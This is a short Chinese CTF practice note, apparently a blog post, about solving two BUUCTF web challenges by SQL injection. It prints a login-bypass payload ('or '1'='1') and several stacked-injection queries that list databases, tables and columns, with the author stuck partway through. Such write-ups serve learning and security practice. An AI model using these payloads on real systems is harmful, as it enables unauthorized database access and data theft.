CTF web刷题笔记
菜狗二进制学不下去了开始学web嗷
SQL注入
buu_[极客大挑战 2019]EasySQL
听说SQL注入有万能密码
username=admin' or '1'='1&password=admin' or '1'='1


buu_随便注

输入2显示miaomiaomiao其他就没了

先用?inject=1’测试下

1';show databases;#
听说这叫堆叠注入?

1';show tables;#

1';show columns from `1919810931114514`;#

后面不会做了。。。听说要改表名啥的贴个大佬的WP吧

尼玛这第三题就这么难了?还tm五千多人做出来了?这是逼我滚回去做二进制?
本文记录了作者在CTF比赛中进行Web题目练习的过程,特别是针对SQL注入的解题心得。通过尝试解决buu_[极客大挑战 2019]EasySQL和buu_随便注两道题,作者接触到了SQL注入的万能密码和堆叠注入概念。然而在后续解题中遇到困难,计划研究如何修改表名等高级技巧。

1897

被折叠的 条评论
为什么被折叠?



